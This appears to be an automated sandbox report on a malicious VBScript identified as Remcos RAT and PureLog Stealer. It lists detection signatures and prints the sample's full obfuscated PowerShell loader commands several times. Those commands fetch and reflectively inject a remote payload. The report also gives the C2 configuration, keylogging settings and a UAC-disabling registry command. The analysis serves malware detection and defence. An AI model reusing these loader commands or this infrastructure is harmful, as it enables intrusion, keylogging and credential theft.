Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
asegurar.vbs

Overview

General Information

Sample name:asegurar.vbs
Analysis ID:1519310
MD5:68f1d5edc9ea0eed35df8223763daee8
SHA1:70cace5a37a31722c7e860ce9dd9fad8ea326be1
SHA256:dc8376cec72b52f0a7e6ef863740991cad8e2c99d769460e73f0593c4405fce8
Tags:vbsuser-lontze7
Infos:

Detection

Remcos, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected PureLog Stealer
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Installs a global keyboard hook
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect virtual machines (SLDT)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 3540 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\asegurar.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 968 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzF9JysndXJsICcrJz0nKycgezB9aHQnKyd0cCcrJ3MnKyc6Ly9pYTYwMDEnKycwMCcrJy51cy4nKydhcmNoaXZlJysnLm9yJysnZycrJy8yNC8nKydpdGVtcy9kJysnZXQnKydhaC0nKyduJysnb3QnKydlLScrJ3YvRCcrJ2UnKyd0JysnYScrJ2hOJysnb3RlVicrJy4nKyd0JysneCcrJ3R7MH0nKyc7eycrJzEnKyd9YmFzZTYnKyc0JysnQ28nKydudGVudCA9IChOZScrJ3cnKyctT2JqZWMnKyd0IFN5c3RlJysnbS5OZXQuJysnV2ViQ2xpZScrJ250KS5EJysnb3cnKydubCcrJ28nKydhJysnZFN0cmknKyduZyh7MX11JysncmwpOycrJ3snKycxJysnfWJpbicrJ2FyeUNvJysnbicrJ3RlbnQgPScrJyBbU3knKydzdCcrJ2VtLicrJ0MnKydvbnZlcnQnKyddOjonKydGJysncm9tJysnQicrJ2EnKydzZTY0JysnU3RyaW5nKHsxfWJhc2U2NCcrJ0NvbnQnKydlbicrJ3QpO3sxJysnfWFzJysnc2UnKydtYmx5JysnID0nKycgW1JlZmwnKydlY3QnKydpbycrJ24uJysnQXMnKydzZW1ibHknKyddOjpMb2FkJysnKHsxfScrJ2JpbmFyJysneUNvbicrJ3RlbnQpO3sxfXR5JysncCcrJ2UgJysnPSB7MX1hJysnc3MnKydlbWJsJysneScrJy4nKydHZXRUeXAnKydlKHsnKycwfVJ1bicrJ1BFLkhvbWV7JysnMH0pOycrJ3snKycxfW0nKydlJysndCcrJ2gnKydvZCA9IHsxfXR5cCcrJ2UuR2UnKyd0TWUnKyd0aCcrJ29kKHsnKycwfVZBSXswfSk7ezEnKyd9bWV0JysnaG8nKydkJysnLkknKydudm9rZSh7MScrJ31udScrJ2xsJysnLCBbb2InKydqZWMnKyd0WycrJ10nKyddJysnQCcrJyh7JysnMH0wLycrJ1lqemInKyd0JysnL2QvZScrJ2UuZScrJ3RzYXAvLzpzJysncCcrJ3QnKyd0aHswfScrJyAsIHswfWQnKydlJysnc2F0JysnaXZhZCcrJ28nKyd7MH0gJysnLCcrJyB7MH1kZXNhdCcrJ2knKyd2JysnYWQnKydvJysnezB9ICwnKycgeycrJzAnKyd9ZGVzYXRpdicrJ2EnKydkb3swJysnfSwnKyd7MH0nKydBZGRJblByb2MnKydlcycrJ3MnKyczJysnMnswfSx7MH0nKyd7MCcrJ30pKScpLWYgIFtjSEFyXTM5LFtjSEFyXTM2KSB8JiAoICRlTnY6Q09Nc1BFY1s0LDI0LDI1XS1qT2luJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6488 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'1}'+'url '+'='+' {0}ht'+'tp'+'s'+'://ia6001'+'00'+'.us.'+'archive'+'.or'+'g'+'/24/'+'items/d'+'et'+'ah-'+'n'+'ot'+'e-'+'v/D'+'e'+'t'+'a'+'hN'+'oteV'+'.'+'t'+'x'+'t{0}'+';{'+'1'+'}base6'+'4'+'Co'+'ntent = (Ne'+'w'+'-Objec'+'t Syste'+'m.Net.'+'WebClie'+'nt).D'+'ow'+'nl'+'o'+'a'+'dStri'+'ng({1}u'+'rl);'+'{'+'1'+'}bin'+'aryCo'+'n'+'tent ='+' [Sy'+'st'+'em.'+'C'+'onvert'+']::'+'F'+'rom'+'B'+'a'+'se64'+'String({1}base64'+'Cont'+'en'+'t);{1'+'}as'+'se'+'mbly'+' ='+' [Refl'+'ect'+'io'+'n.'+'As'+'sembly'+']::Load'+'({1}'+'binar'+'yCon'+'tent);{1}ty'+'p'+'e '+'= {1}a'+'ss'+'embl'+'y'+'.'+'GetTyp'+'e({'+'0}Run'+'PE.Home{'+'0});'+'{'+'1}m'+'e'+'t'+'h'+'od = {1}typ'+'e.Ge'+'tMe'+'th'+'od({'+'0}VAI{0});{1'+'}met'+'ho'+'d'+'.I'+'nvoke({1'+'}nu'+'ll'+', [ob'+'jec'+'t['+']'+']'+'@'+'({'+'0}0/'+'Yjzb'+'t'+'/d/e'+'e.e'+'tsap//:s'+'p'+'t'+'th{0}'+' , {0}d'+'e'+'sat'+'ivad'+'o'+'{0} '+','+' {0}desat'+'i'+'v'+'ad'+'o'+'{0} ,'+' {'+'0'+'}desativ'+'a'+'do{0'+'},'+'{0}'+'AddInProc'+'es'+'s'+'3'+'2{0},{0}'+'{0'+'}))')-f [cHAr]39,[cHAr]36) |& ( $eNv:COMsPEc[4,24,25]-jOin'')" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • AddInProcess32.exe (PID: 3820 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
        • AddInProcess32.exe (PID: 5344 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": "23spt.duckdns.org:3000:0", "Assigned name": "Tost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-RZH5WZ", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    SourceRuleDescriptionAuthorStrings
    00000007.00000002.2589118650.000000000288F000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000007.00000002.2588250443.0000000000C28000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000005.00000002.1472944209.0000019CB5E90000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            00000007.00000002.2586922094.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
              Click to see the 24 entries
              SourceRuleDescriptionAuthorStrings
              7.2.AddInProcess32.exe.400000.0.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                7.2.AddInProcess32.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                  7.2.AddInProcess32.exe.400000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                    7.2.AddInProcess32.exe.400000.0.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                    • 0x6aab8:$a1: Remcos restarted by watchdog!
                    • 0x6b030:$a3: %02i:%02i:%02i:%03i
                    7.2.AddInProcess32.exe.400000.0.unpackREMCOS_RAT_variantsunknownunknown
                    • 0x64b0c:$str_a1: C:\Windows\System32\cmd.exe
                    • 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                    • 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                    • 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                    • 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                    • 0x64b7c:$str_b2: Executing file:
                    • 0x65bfc:$str_b3: GetDirectListeningPort
                    • 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                    • 0x65728:$str_b7: \update.vbs
                    • 0x64ba4:$str_b9: Downloaded file:
                    • 0x64b90:$str_b10: Downloading file:
                    • 0x64c34:$str_b12: Failed to upload file:
                    • 0x65bc4:$str_b13: StartForward
                    • 0x65be4:$str_b14: StopForward
                    • 0x65680:$str_b15: fso.DeleteFile "
                    • 0x65614:$str_b16: On Error Resume Next
                    • 0x656b0:$str_b17: fso.DeleteFolder "
                    • 0x64c24:$str_b18: Uploaded file:
                    • 0x64be4:$str_b19: Unable to delete:
                    • 0x65648:$str_b20: while fso.FileExists("
                    • 0x650c1:$str_c0: [Firefox StoredLogins not found]
                    Click to see the 22 entries

                    System Summary

                    barindex
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzF9JysndXJsICcrJz0nKycgezB9aHQnKyd0cCcrJ3MnKyc6Ly9pYTYwMDEnKycwMCcrJy51cy4nKydhcmNoaXZlJysnLm9yJysnZycrJy8yNC8nKydpdGVtcy9kJysnZXQnKydhaC0nKyduJysnb3QnKydlLScrJ3YvRCcrJ2UnKyd0JysnYScrJ2hOJysnb3RlVicrJy4nKyd0JysneCcrJ3R7MH0nKyc7eycrJzEnKyd9YmFzZTYnKyc0JysnQ28nKydudGVudCA9IChOZScrJ3cnKyctT2JqZWMnKyd0IFN5c3RlJysnbS5OZXQuJysnV2ViQ2xpZScrJ250KS5EJysnb3cnKydubCcrJ28nKydhJysnZFN0cmknKyduZyh7MX11JysncmwpOycrJ3snKycxJysnfWJpbicrJ2FyeUNvJysnbicrJ3RlbnQgPScrJyBbU3knKydzdCcrJ2VtLicrJ0MnKydvbnZlcnQnKyddOjonKydGJysncm9tJysnQicrJ2EnKydzZTY0JysnU3RyaW5nKHsxfWJhc2U2NCcrJ0NvbnQnKydlbicrJ3QpO3sxJysnfWFzJysnc2UnKydtYmx5JysnID0nKycgW1JlZmwnKydlY3QnKydpbycrJ24uJysnQXMnKydzZW1ibHknKyddOjpMb2FkJysnKHsxfScrJ2JpbmFyJysneUNvbicrJ3RlbnQpO3sxfXR5JysncCcrJ2UgJysnPSB7MX1hJysnc3MnKydlbWJsJysneScrJy4nKydHZXRUeXAnKydlKHsnKycwfVJ1bicrJ1BFLkhvbWV7JysnMH0pOycrJ3snKycxfW0nKydlJysndCcrJ2gnKydvZCA9IHsxfXR5cCcrJ2UuR2UnKyd0TWUnKyd0aCcrJ29kKHsnKycwfVZBSXswfSk7ezEnKyd9bWV0JysnaG8nKydkJysnLkknKydudm9rZSh7MScrJ31udScrJ2xsJysnLCBbb2InKydqZWMnKyd0WycrJ10nKyddJysnQCcrJyh7JysnMH0wLycrJ1lqemInKyd0JysnL2QvZScrJ2UuZScrJ3RzYXAvLzpzJysncCcrJ3QnKyd0aHswfScrJyAsIHswfWQnKydlJysnc2F0JysnaXZhZCcrJ28nKyd7MH0gJysnLCcrJyB7MH1kZXNhdCcrJ2knKyd2JysnYWQnKydvJysnezB9ICwnKycgeycrJzAnKyd9ZGVzYXRpdicrJ2EnKydkb3swJysnfSwnKyd7MH0nKydBZGRJblByb2MnKydlcycrJ3MnKyczJysnMnswfSx7MH0nKyd7MCcrJ30pKScpLWYgIFtjSEFyXTM5LFtjSEFyXTM2KSB8JiAoICRlTnY6Q09Nc1BFY1s0LDI0LDI1XS1qT2luJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzF9JysndXJsICcrJz0nKycgezB9aHQnKyd0cCcrJ3MnKyc6Ly9pYTYwMDEnKycwMCcrJy51cy4nKydhcmNoaXZlJysnLm9yJysnZycrJy8yNC8nKydpdGVtcy9kJysnZXQnKydhaC0nKyduJysnb3QnKydlLScrJ3YvRCcrJ2UnKyd0JysnYScrJ2hOJysnb3RlVicrJy4nKyd0JysneCcrJ3R7MH0nKyc7eycrJzEnKyd9YmFzZTYnKyc0JysnQ28nKydudGVudCA9IChOZScrJ3cnKyctT2JqZWMnKyd0IFN5c3RlJysnbS5OZXQuJysnV2ViQ2xpZScrJ250KS5EJysnb3cnKydubCcrJ28nKydhJysnZFN0cmknKyduZyh7MX11JysncmwpOycrJ3snKycxJysnfWJpbicrJ2FyeUNvJysnbicrJ3RlbnQgPScrJyBbU3knKydzdCcrJ2VtLicrJ0MnKydvbnZlcnQnKyddOjonKydGJysncm9tJysnQicrJ2EnKydzZTY0JysnU3RyaW5nKHsxfWJhc2U2NCcrJ0NvbnQnKydlbicrJ3QpO3sxJysnfWFzJysnc2UnKydtYmx5JysnID0nKycgW1JlZmwnKydlY3QnKydpbycrJ24uJysnQXMnKydzZW1ibHknKyddOjpMb2FkJysnKHsxfScrJ2JpbmFyJysneUNvbicrJ3RlbnQpO3sxfXR5JysncCcrJ2UgJysnPSB7MX1hJysnc3MnKydlbWJsJysneScrJy4nKydHZXRUeXAnKydlKHsnKycwfVJ1bicrJ1BFLkhvbWV7JysnMH0pOycrJ3snKycxfW0nKydlJysndCcrJ2gnKydvZCA9IHsxfXR5cCcrJ2UuR2UnKyd0TWUnKyd0aCcrJ29kKHsnKycwfVZBSXswfSk7ezEnKyd9bWV0JysnaG8nKydkJysnLkknKydudm9rZSh7MScrJ31udScrJ2xsJysnLCBbb2InKydqZWMnKyd0WycrJ10nKyddJysnQCcrJyh7JysnMH0wLycrJ1lqemInKyd0JysnL2QvZScrJ2UuZScrJ3RzYXAvLzpzJysncCcrJ3QnKyd0aHswfScrJyAsIHswfWQnKydlJysnc2F0JysnaXZhZCcrJ28nKyd7MH0gJysnLCcrJyB7MH1kZXNhdCcr
                    Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'1}'+'url '+'='+' {0}ht'+'tp'+'s'+'://ia6001'+'00'+'.us.'+'archive'+'.or'+'g'+'/24/'+'items/d'+'et'+'ah-'+'n'+'ot'+'e-'+'v/D'+'e'+'t'+'a'+'hN'+'oteV'+'.'+'t'+'x'+'t{0}'+';{'+'1'+'}base6'+'4'+'Co'+'ntent = (Ne'+'w'+'-Objec'+'t Syste'+'m.Net.'+'WebClie'+'nt).D'+'ow'+'nl'+'o'+'a'+'dStri'+'ng({1}u'+'rl);'+'{'+'1'+'}bin'+'aryCo'+'n'+'tent ='+' [Sy'+'st'+'em.'+'C'+'onvert'+']::'+'F'+'rom'+'B'+'a'+'se64'+'String({1}base64'+'Cont'+'en'+'t);{1'+'}as'+'se'+'mbly'+' ='+' [Refl'+'ect'+'io'+'n.'+'As'+'sembly'+']::Load'+'({1}'+'binar'+'yCon'+'tent);{1}ty'+'p'+'e '+'= {1}a'+'ss'+'embl'+'y'+'.'+'GetTyp'+'e({'+'0}Run'+'PE.Home{'+'0});'+'{'+'1}m'+'e'+'t'+'h'+'od = {1}typ'+'e.Ge'+'tMe'+'th'+'od({'+'0}VAI{0});{1'+'}met'+'ho'+'d'+'.I'+'nvoke({1'+'}nu'+'ll'+', [ob'+'jec'+'t['+']'+']'+'@'+'({'+'0}0/'+'Yjzb'+'t'+'/d/e'+'e.e'+'tsap//:s'+'p'+'t'+'th{0}'+' , {0}d'+'e'+'sat'+'ivad'+'o'+'{0} '+','+' {0}desat'+'i'+'v'+'ad'+'o'+'{0} ,'+' {'+'0'+'}desativ'+'a'+'do{0'+'},'+'{0}'+'AddInProc'+'es'+'s'+'3'+'2{0},{0}'+'{0'+'}))')-f [cHAr]39,[cHAr]36) |& ( $eNv:COMsPEc[4,24,25]-jOin'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'1}'+'url '+'='+' {0}ht'+'tp'+'s'+'://ia6001'+'00'+'.us.'+'archive'+'.or'+'g'+'/24/'+'items/d'+'et'+'ah-'+'n'+'ot'+'e-'+'v/D'+'e'+'t'+'a'+'hN'+'oteV'+'.'+'t'+'x'+'t{0}'+';{'+'1'+'}base6'+'4'+'Co'+'ntent = (Ne'+'w'+'-Objec'+'t Syste'+'m.Net.'+'WebClie'+'nt).D'+'ow'+'nl'+'o'+'a'+'dStri'+'ng({1}u'+'rl);'+'{'+'1'+'}bin'+'aryCo'+'n'+'tent ='+' [Sy'+'st'+'em.'+'C'+'onvert'+']::'+'F'+'rom'+'B'+'a'+'se64'+'String({1}base64'+'Cont'+'en'+'t);{1'+'}as'+'se'+'mbly'+' ='+' [Refl'+'ect'+'io'+'n.'+'As'+'sembly'+']::Load'+'({1}'+'binar'+'yCon'+'tent);{1}ty'+'p'+'e '+'= {1}a'+'ss'+'embl'+'y'+'.'+'GetTyp'+'e({'+'0}Run'+'PE.Home{'+'0});'+'{'+'1}m'+'e'+'t'+'h'+'od = {1}typ'+'e.Ge'+'tMe'+'th'+'od({'+'0}VAI{0});{1'+'}met'+'ho'+'d'+'.I'+'nvoke({1'+'}nu'+'ll'+', [ob'+'jec'+'t['+']'+']'+'@'+'({'+'0}0/'+'Yjzb'+'t'+'/d/e'+'e.e'+'tsap//:s'+'p'+'t'+'th{0}'+' , {0}d'+'e'+'sat'+'ivad'+'o'+'{0} '+','+' {0}desat'+'i'+'v'+'ad'+'o'+'{0} ,'+' {'+'0'+'}desativ'+'a'+'do{0'+'},'+'{0}'+'AddInProc'+'es'+'s'+'3'+'2{0},{0}'+'{0'+'}))')-f [cHAr]39,[cHAr]36) |& ( $eNv:COMsPEc[4,24,25]-jOin'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzF9JysndXJsICcrJz0nKycgezB9aHQnKyd0cCcrJ3MnKyc6Ly9pYTYwMDEnKycwMCcrJy51cy4nKydhcmNoaXZlJysnLm9yJysnZycrJy8yNC8nKydpdGVtcy9kJysnZXQnKydhaC0nKyduJysnb3QnKydlLScrJ3YvRCcrJ2UnKyd0JysnYScrJ2hOJysnb3RlVicrJy4nK
                    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'1}'+'url '+'='+' {0}ht'+'tp'+'s'+'://ia6001'+'00'+'.us.'+'archive'+'.or'+'g'+'/24/'+'items/d'+'et'+'ah-'+'n'+'ot'+'e-'+'v/D'+'e'+'t'+'a'+'hN'+'oteV'+'.'+'t'+'x'+'t{0}'+';{'+'1'+'}base6'+'4'+'Co'+'ntent = (Ne'+'w'+'-Objec'+'t Syste'+'m.Net.'+'WebClie'+'nt).D'+'ow'+'nl'+'o'+'a'+'dStri'+'ng({1}u'+'rl);'+'{'+'1'+'}bin'+'aryCo'+'n'+'tent ='+' [Sy'+'st'+'em.'+'C'+'onvert'+']::'+'F'+'rom'+'B'+'a'+'se64'+'String({1}base64'+'Cont'+'en'+'t);{1'+'}as'+'se'+'mbly'+' ='+' [Refl'+'ect'+'io'+'n.'+'As'+'sembly'+']::Load'+'({1}'+'binar'+'yCon'+'tent);{1}ty'+'p'+'e '+'= {1}a'+'ss'+'embl'+'y'+'.'+'GetTyp'+'e({'+'0}Run'+'PE.Home{'+'0});'+'{'+'1}m'+'e'+'t'+'h'+'od = {1}typ'+'e.Ge'+'tMe'+'th'+'od({'+'0}VAI{0});{1'+'}met'+'ho'+'d'+'.I'+'nvoke({1'+'}nu'+'ll'+', [ob'+'jec'+'t['+']'+']'+'@'+'({'+'0}0/'+'Yjzb'+'t'+'/d/e'+'e.e'+'tsap//:s'+'p'+'t'+'th{0}'+' , {0}d'+'e'+'sat'+'ivad'+'o'+'{0} '+','+' {0}desat'+'i'+'v'+'ad'+'o'+'{0} ,'+' {'+'0'+'}desativ'+'a'+'do{0'+'},'+'{0}'+'AddInProc'+'es'+'s'+'3'+'2{0},{0}'+'{0'+'}))')-f [cHAr]39,[cHAr]36) |& ( $eNv:COMsPEc[4,24,25]-jOin'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{'+'1}'+'url '+'='+' {0}ht'+'tp'+'s'+'://ia6001'+'00'+'.us.'+'archive'+'.or'+'g'+'/24/'+'items/d'+'et'+'ah-'+'n'+'ot'+'e-'+'v/D'+'e'+'t'+'a'+'hN'+'oteV'+'.'+'t'+'x'+'t{0}'+';{'+'1'+'}base6'+'4'+'Co'+'ntent = (Ne'+'w'+'-Objec'+'t Syste'+'m.Net.'+'WebClie'+'nt).D'+'ow'+'nl'+'o'+'a'+'dStri'+'ng({1}u'+'rl);'+'{'+'1'+'}bin'+'aryCo'+'n'+'tent ='+' [Sy'+'st'+'em.'+'C'+'onvert'+']::'+'F'+'rom'+'B'+'a'+'se64'+'String({1}base64'+'Cont'+'en'+'t);{1'+'}as'+'se'+'mbly'+' ='+' [Refl'+'ect'+'io'+'n.'+'As'+'sembly'+']::Load'+'({1}'+'binar'+'yCon'+'tent);{1}ty'+'p'+'e '+'= {1}a'+'ss'+'embl'+'y'+'.'+'GetTyp'+'e({'+'0}Run'+'PE.Home{'+'0});'+'{'+'1}m'+'e'+'t'+'h'+'od = {1}typ'+'e.Ge'+'tMe'+'th'+'od({'+'0}VAI{0});{1'+'}met'+'ho'+'d'+'.I'+'nvoke({1'+'}nu'+'ll'+', [ob'+'jec'+'t['+']'+']'+'@'+'({'+'0}0/'+'Yjzb'+'t'+'/d/e'+'e.e'+'tsap//:s'+'p'+'t'+'th{0}'+' , {0}d'+'e'+'sat'+'ivad'+'o'+'{0} '+','+' {0}desat'+'i'+'v'+'ad'+'o'+'{0} ,'+' {'+'0'+'}desativ'+'a'+'do{0'+'},'+'{0}'+'AddInProc'+'es'+'s'+'3'+'2{0},{0}'+'{0'+'}))')-f [cHAr]39,[cHAr]36) |& ( $eNv:COMsPEc[4,24,25]-jOin'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzF9JysndXJsICcrJz0nKycgezB9aHQnKyd0cCcrJ3MnKyc6Ly9pYTYwMDEnKycwMCcrJy51cy4nKydhcmNoaXZlJysnLm9yJysnZycrJy8yNC8nKydpdGVtcy9kJysnZXQnKydhaC0nKyduJysnb3QnKydlLScrJ3YvRCcrJ2UnKyd0JysnYScrJ2hOJysnb3RlVicrJy4nK
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzF9JysndXJsICcrJz0nKycgezB9aHQnKyd0cCcrJ3MnKyc6Ly9pYTYwMDEnKycwMCcrJy51cy4nKydhcmNoaXZlJysnLm9yJysnZycrJy8yNC8nKydpdGVtcy9kJysnZXQnKydhaC0nKyduJysnb3QnKydlLScrJ3YvRCcrJ2UnKyd0JysnYScrJ2hOJysnb3RlVicrJy4nKyd0JysneCcrJ3R7MH0nKyc7eycrJzEnKyd9YmFzZTYnKyc0JysnQ28nKydudGVudCA9IChOZScrJ3cnKyctT2JqZWMnKyd0IFN5c3RlJysnbS5OZXQuJysnV2ViQ2xpZScrJ250KS5EJysnb3cnKydubCcrJ28nKydhJysnZFN0cmknKyduZyh7MX11JysncmwpOycrJ3snKycxJysnfWJpbicrJ2FyeUNvJysnbicrJ3RlbnQgPScrJyBbU3knKydzdCcrJ2VtLicrJ0MnKydvbnZlcnQnKyddOjonKydGJysncm9tJysnQicrJ2EnKydzZTY0JysnU3RyaW5nKHsxfWJhc2U2NCcrJ0NvbnQnKydlbicrJ3QpO3sxJysnfWFzJysnc2UnKydtYmx5JysnID0nKycgW1JlZmwnKydlY3QnKydpbycrJ24uJysnQXMnKydzZW1ibHknKyddOjpMb2FkJysnKHsxfScrJ2JpbmFyJysneUNvbicrJ3RlbnQpO3sxfXR5JysncCcrJ2UgJysnPSB7MX1hJysnc3MnKydlbWJsJysneScrJy4nKydHZXRUeXAnKydlKHsnKycwfVJ1bicrJ1BFLkhvbWV7JysnMH0pOycrJ3snKycxfW0nKydlJysndCcrJ2gnKydvZCA9IHsxfXR5cCcrJ2UuR2UnKyd0TWUnKyd0aCcrJ29kKHsnKycwfVZBSXswfSk7ezEnKyd9bWV0JysnaG8nKydkJysnLkknKydudm9rZ